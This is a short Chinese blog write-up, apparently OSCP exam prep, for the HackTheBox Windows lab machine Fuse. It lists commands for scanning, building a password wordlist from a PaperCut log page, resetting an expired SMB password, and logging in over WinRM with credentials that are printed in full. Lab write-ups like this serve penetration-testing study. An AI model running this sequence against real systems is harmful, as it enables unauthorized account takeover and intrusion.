EthanDoctor

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

Ethan医生7个月前靶场266

fuse

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)

image.png

nslookup fabricorp.local  10.129.2.5

image.png

image.png


smbclient -L //10.129.2.5/ -N  

image.png


http://fuse.fabricorp.local/papercut/logs/html/index.htm

image.png

cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers



smbclient -L //10.129.2.5 -U tlavel%Fabricorp01

image.png



错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE
需要用smbpasswd修改密码


sudo smbpasswd -r 10.129.235.28 -U tlavel

smbpasswd -r 10.129.235.28 bhult

更新密码后直接登入然后提权


evil-winrm -i 10.129.235.28 -u svc-print -p '$fab@s3Rv1ce$1'

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x54_HackThBox靶机_Windows_remote

下一篇:OSCP备考_0x56_HackThBox靶机_Windows_worker

相关文章

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号